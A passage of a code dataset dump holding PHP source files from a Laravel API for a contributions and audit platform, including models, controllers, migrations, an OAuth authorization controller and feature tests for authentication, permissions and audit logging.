"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse InvalidArgumentException;\n\n/**\n * @property \\App\\Models\\FileToken $fileToken\n * @property string $decryptionKey\n */\nclass Export\n{\n /**\n * @var \\App\\Models\\FileToken\n */\n protected $fileToken;\n\n /**\n * @var string\n */\n protected $decryptionKey;\n\n /**\n * Export constructor.\n *\n * @param \\App\\Models\\FileToken $fileToken\n * @param string $decryptionKey\n */\n public function __construct(FileToken $fileToken, string $decryptionKey)\n {\n $this->fileToken = $fileToken;\n $this->decryptionKey = $decryptionKey;\n }\n\n /**\n * @param string $name\n * @return mixed\n */\n public function __get(string $name)\n {\n if (property_exists($this, $name)) {\n return $this->$name;\n }\n\n throw new InvalidArgumentException(\"The property [$name] does not exist\");\n }\n\n /**\n * @param \\App\\Models\\Export $export\n * @return bool\n */\n public function is(self $export): bool\n {\n return $this->fileToken === $export->fileToken\n && $this->decryptionKey === $export->decryptionKey;\n }\n}\n"
},
{
"alpha_fraction": 0.5302644968032837,
"alphanum_fraction": 0.5381485223770142,
"avg_line_length": 27.91176414489746,
"blob_id": "3f2feccdf8d0b34bc4cbfc2b358bfafddd8c52f2",
"content_id": "6b5b798bd93ca121f57d993022d26c41792c9035",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3932,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 136,
"path": "/tests/Feature/V1/EndUser/MeControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\EndUser;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass MeControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_invoke(): void\n {\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_can_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_cannot_invoke(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_invoke(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/end-users/me');\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_invoke(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->getJson('/v1/end-users/me');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7145110368728638,
"alphanum_fraction": 0.7160883545875549,
"avg_line_length": 26.565217971801758,
"blob_id": "d74b66b934eb795fcff987d19f380c37b6e557a3",
"content_id": "3eeb13ff74bf8faf0462c4927bf1941b23456dd4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 634,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 23,
"path": "/app/Docs/ExternalDocs.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\ExternalDocs as BaseExternalDocs;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass ExternalDocs extends BaseExternalDocs\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\ExternalDocs\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->description('The GitHub repo')\n ->url(Config::get('connecting_voices.repo_url'));\n }\n}\n"
},
{
"alpha_fraction": 0.6098606586456299,
"alphanum_fraction": 0.6102893948554993,
"avg_line_length": 29.6907901763916,
"blob_id": "d6630542a3b93ac4e9341255593c39a5d2e8f008",
"content_id": "81b34bcec7d249db846711ffe9f184c32156d497",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4665,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 152,
"path": "/app/Http/Controllers/V1/AdminController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Admin\\EmailFilter;\nuse App\\Http\\Requests\\Admin\\StoreAdminRequest;\nuse App\\Http\\Requests\\Admin\\UpdateAdminRequest;\nuse App\\Http\\Resources\\AdminResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Http\\Sorts\\Admin\\EmailSort;\nuse App\\Models\\Admin;\nuse App\\Services\\AdminService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\nuse Spatie\\QueryBuilder\\Sort;\n\nclass AdminController extends ApiController\n{\n /**\n * @var \\App\\Services\\AdminService\n */\n protected $adminService;\n\n /**\n * AdminController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\AdminService $adminService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n AdminService $adminService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Admin::class);\n\n $this->adminService = $adminService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Admin::query()\n ->with('user');\n\n $admins = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n 'name',\n 'phone',\n Filter::custom('email', EmailFilter::class),\n ])\n ->allowedSorts([\n 'name',\n 'phone',\n Sort::custom('email', EmailSort::class),\n ])\n ->defaultSort('name')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all admins.'));\n\n return AdminResource::collection($admins);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Admin\\StoreAdminRequest $request\n * @throws \\Throwable\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreAdminRequest $request): JsonResource\n {\n $admin = DB::transaction(function () use ($request): Admin {\n return $this->adminService->create([\n 'name' => $request->name,\n 'phone' => $request->phone,\n 'email' => $request->email,\n 'password' => $request->password,\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Admin $admin\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Admin $admin): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Admin\\UpdateAdminRequest $request\n * @param \\App\\Models\\Admin $admin\n * @throws \\Throwable\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(UpdateAdminRequest $request, Admin $admin): JsonResource\n {\n $admin = DB::transaction(function () use ($request, $admin): Admin {\n return $this->adminService->update($admin, [\n 'name' => $request->name,\n 'phone' => $request->phone,\n 
'email' => $request->email,\n 'password' => $request->password,\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Admin $admin\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(Request $request, Admin $admin): ResourceDeletedResponse\n {\n DB::transaction(function () use ($admin): void {\n $this->adminService->delete($admin);\n });\n\n event(EndpointInvoked::onDelete($request, \"Deleted admin [{$admin->id}].\"));\n\n return new ResourceDeletedResponse('admin');\n }\n}\n"
},
{
"alpha_fraction": 0.6438642144203186,
"alphanum_fraction": 0.6443864107131958,
"avg_line_length": 24.87837791442871,
"blob_id": "7d76982683a22b00ff9f1b16a82567d2c0832df6",
"content_id": "e410e211c8d9732dfb326b189f74af14b28d4a75",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1915,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 74,
"path": "/app/Models/Relationships/EndUserRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\Country;\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait EndUserRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class)->withTrashed();\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function country(): BelongsTo\n {\n return $this->belongsTo(Country::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function contributions(): HasMany\n {\n return $this->hasMany(Contribution::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function publicContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function privateContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PRIVATE);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function inReviewContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_IN_REVIEW);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function changesRequestedContributions(): HasMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_CHANGES_REQUESTED);\n }\n}\n"
},
{
"alpha_fraction": 0.5843806266784668,
"alphanum_fraction": 0.5852782726287842,
"avg_line_length": 29.108108520507812,
"blob_id": "3cc93162fea9517bd3a8d196e12e6191bfdaf73a",
"content_id": "b4dfad4a1c0b008fa7b8d031ae2797f9ba76536f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1114,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 37,
"path": "/database/migrations/2019_05_28_171853_create_contributions_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contributions', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('end_user_id')->unique();\n $table->foreign('end_user_id')->references('id')->on('end_users');\n $table->text('content');\n $table->string('status');\n $table->foreign('status')->references('status')->on('contribution_statuses');\n $table->text('changes_requested')->nullable();\n $table->timestamp('status_last_updated_at')->useCurrent();\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contributions');\n }\n}\n"
},
{
"alpha_fraction": 0.5774253606796265,
"alphanum_fraction": 0.5783582329750061,
"avg_line_length": 27.972972869873047,
"blob_id": "a64bc583ffe6259c6b64210f7b8433d2a35e1031",
"content_id": "e64dd8e8c2c58450c4e5e84274602629bf3a09df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 37,
"path": "/database/migrations/2019_05_29_103809_create_notifications_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateNotificationsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('notifications', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('user_id')->nullable();\n $table->foreign('user_id')->references('id')->on('users');\n $table->string('channel');\n $table->foreign('channel')->references('channel')->on('notification_channels');\n $table->string('recipient');\n $table->text('content');\n $table->timestamp('sent_at')->nullable();\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('notifications');\n }\n}\n"
},
{
"alpha_fraction": 0.5882620811462402,
"alphanum_fraction": 0.5887170433998108,
"avg_line_length": 34.45161437988281,
"blob_id": "ffccd8528b47b9ec8c6d55650fef53611560d529",
"content_id": "7028dc696aece43443ce5c83678fae706a10eafd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2198,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 62,
"path": "/app/Http/Controllers/Passport/AuthorizationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Passport;\n\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Response;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Http\\Controllers\\AuthorizationController as BaseAuthorizationController;\nuse Laravel\\Passport\\TokenRepository;\nuse Psr\\Http\\Message\\ServerRequestInterface;\n\nclass AuthorizationController extends BaseAuthorizationController\n{\n /**\n * Authorize a client to access the user's account.\n *\n * @param \\Psr\\Http\\Message\\ServerRequestInterface $psrRequest\n * @param \\Illuminate\\Http\\Request $request\n * @param \\Laravel\\Passport\\ClientRepository $clients\n * @param \\Laravel\\Passport\\TokenRepository $tokens\n * @return \\Illuminate\\Http\\Response\n */\n public function authorize(\n ServerRequestInterface $psrRequest,\n Request $request,\n ClientRepository $clients,\n TokenRepository $tokens\n ): Response {\n return $this->withErrorHandling(\n function () use ($psrRequest, $request, $clients, $tokens): Response {\n $authRequest = $this->server->validateAuthorizationRequest($psrRequest);\n\n $scopes = $this->parseScopes($authRequest);\n\n $token = $tokens->findValidToken(\n $user = $request->user(),\n $client = $clients->find($authRequest->getClient()->getIdentifier())\n );\n\n if ($token && $token->scopes === collect($scopes)->pluck('id')->all()) {\n return $this->approveRequest($authRequest, $user);\n }\n\n // If the client is first party, then immediately approve the request.\n if ($client->first_party_client) {\n return $this->approveRequest($authRequest, $user);\n }\n\n $request->session()->put('authRequest', $authRequest);\n\n return $this->response->view('passport::authorize', [\n 'client' => $client,\n 'user' => $user,\n 'scopes' => $scopes,\n 'request' => $request,\n ]);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6204379796981812,
"alphanum_fraction": 0.62189781665802,
"avg_line_length": 24.370370864868164,
"blob_id": "105ae56ac1ee2914773e173c11fe7e565e7a98cf",
"content_id": "7ad33ace18c7efd8688dd93709012e88cbb927b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 685,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 27,
"path": "/app/Http/Filters/Audit/EndUserIdFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Audit;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EndUserIdFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $endUserId\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $endUserId, string $property): Builder\n {\n return $query->whereHas(\n 'user.endUser',\n function (Builder $query) use ($endUserId): void {\n $query->where('id', '=', $endUserId);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.49272987246513367,
"alphanum_fraction": 0.4998975992202759,
"avg_line_length": 26.902856826782227,
"blob_id": "564437c8ac137794cdf5f522908a88f70f454100",
"content_id": "f648127f87de2abc5400d6019d7781e5baa004c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 9766,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 350,
"path": "/tests/Feature/V1/AuditControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass AuditControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'admin_id',\n 'end_user_id',\n 'client',\n 'action',\n 'description',\n 'ip_address',\n 'user_agent',\n 'created_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $client = (new ClientRepository())\n ->create(null, 'Test Client', 'https://example.com');\n\n $audit = factory(Audit::class)->create([\n 'client_id' => $client->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits');\n\n $response->assertJsonFragment([\n [\n 'id' => $audit->id,\n 'admin_id' => $audit->user_id,\n 'end_user_id' => null,\n 'client' => 'Test Client',\n 'action' => $audit->action,\n 'description' => $audit->description,\n 'ip_address' => $audit->ip_address,\n 'user_agent' => $audit->user_agent,\n 'created_at' => $audit->created_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $audit1 = factory(Audit::class)->create();\n $audit2 = factory(Audit::class)->create();\n $audit3 = factory(Audit::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/audits', [\n 'filter[id]' => \"{$audit1->id},{$audit2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $audit1->id]);\n $response->assertJsonFragment(['id' => $audit2->id]);\n $response->assertJsonMissing(['id' => $audit3->id]);\n }\n\n /** @test */\n public function can_filter_by_admin_id_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n\n $audit1 = factory(Audit::class)->create([\n 'user_id' => $admin1->user->id,\n ]);\n $audit2 = factory(Audit::class)->create([\n 'user_id' => $admin2->user->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/audits', ['filter[admin_id]' => $admin1->id]);\n\n $response->assertJsonFragment(['id' => $audit1->id]);\n $response->assertJsonMissing(['id' => $audit2->id]);\n }\n\n /** @test */\n public function can_filter_by_end_user_id_for_index(): void\n {\n $endUser1 = 
factory(EndUser::class)->create();\n        $endUser2 = factory(EndUser::class)->create();\n\n        $audit1 = factory(Audit::class)->create([\n            'user_id' => $endUser1->user->id,\n        ]);\n        $audit2 = factory(Audit::class)->create([\n            'user_id' => $endUser2->user->id,\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create([\n                'name' => 'Test',\n            ])->user\n        );\n\n        $response = $this->getJson('/v1/audits', ['filter[end_user_id]' => $endUser1->id]);\n\n        $response->assertJsonFragment(['id' => $audit1->id]);\n        $response->assertJsonMissing(['id' => $audit2->id]);\n    }\n\n    /** @test */\n    public function can_sort_by_created_at_for_index(): void\n    {\n        $audit1 = factory(Audit::class)->create([\n            'created_at' => Date::now(),\n        ]);\n        $audit2 = factory(Audit::class)->create([\n            'created_at' => Date::now()->addHour(),\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson('/v1/audits', ['sort' => '-created_at']);\n\n        $response->assertNthIdInCollection(1, $audit1->id);\n        $response->assertNthIdInCollection(0, $audit2->id);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_index(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\User $user */\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        $this->getJson('/v1/audits');\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($user): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === 'Viewed all audits.'\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Show.\n     */\n\n    /** @test */\n    public function guest_cannot_show(): void\n    {\n        $audit = factory(Audit::class)->create();\n\n        $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_show(): void\n    {\n        $audit = factory(Audit::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function admin_can_show(): void\n    {\n        $audit = factory(Audit::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function structure_correct_for_show(): void\n    {\n        $audit = factory(Audit::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n        $response->assertResourceDataStructure([\n            'id',\n            'admin_id',\n            'end_user_id',\n            'client',\n            'action',\n            'description',\n            'ip_address',\n            'user_agent',\n            'created_at',\n        ]);\n    }\n\n    /** @test */\n    public function values_correct_for_show(): void\n    {\n        $client = (new ClientRepository())\n            ->create(null, 'Test Client', 'https://example.com');\n\n        $audit = factory(Audit::class)->create([\n            'client_id' => $client->id,\n        ]);\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->getJson(\"/v1/audits/{$audit->id}\");\n\n        $response->assertJsonFragment([\n            [\n                'id' => $audit->id,\n                'admin_id' => $audit->user_id,\n                'end_user_id' => null,\n                'client' => 'Test Client',\n                'action' => 
$audit->action,\n 'description' => $audit->description,\n 'ip_address' => $audit->ip_address,\n 'user_agent' => $audit->user_agent,\n 'created_at' => $audit->created_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Audit $audit */\n $audit = factory(Audit::class)->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/audits/{$audit->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($audit, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed audit [{$audit->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6202723383903503,
"alphanum_fraction": 0.6217851638793945,
"avg_line_length": 16.394737243652344,
"blob_id": "42067ce4d57c4773c441567890a148e915078dd5",
"content_id": "7ff476061049ade3b563e0980827749f45927421",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 661,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 38,
"path": "/app/Events/EndUser/EndUserSoftDeleted.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\EndUser;\n\nuse App\\Models\\EndUser;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass EndUserSoftDeleted\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * EndUserCreated constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n */\n public function __construct(EndUser $endUser)\n {\n $this->endUser = $endUser;\n }\n\n /**\n * @return \\App\\Models\\EndUser\n */\n public function getEndUser(): EndUser\n {\n return $this->endUser;\n }\n}\n"
},
{
"alpha_fraction": 0.5757749080657959,
"alphanum_fraction": 0.5790601372718811,
"avg_line_length": 31.71495246887207,
"blob_id": "2d5ad9dd4b961c866baaf4fee3ec13d65e556aa3",
"content_id": "94978f431e7583481474105636f716742a2b77eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 7001,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 214,
"path": "/tests/Feature/V1/File/DownloadControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
